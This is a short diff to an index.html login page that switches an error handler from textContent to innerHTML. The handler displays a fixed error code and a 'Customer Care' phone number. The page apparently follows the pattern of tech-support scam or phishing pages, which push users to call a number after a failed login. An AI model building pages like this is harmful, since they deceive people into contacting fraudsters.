--- a/index.html
+++ b/index.html
@@ -195,7 +195,8 @@
         // Show error message on login attempt
         function showErrorMessage() {
             const errorMessage = document.getElementById('error-message');
-            errorMessage.textContent = 'Error Code : 00X47800 <br> Contact Customer Care : +1-844-499-1812';
+            errorMessage.innerHTML = 'Error Code : 00X47800 <br> Contact Customer Care : +1-844-499-1812';
+
         }
 
         // Handle form submission
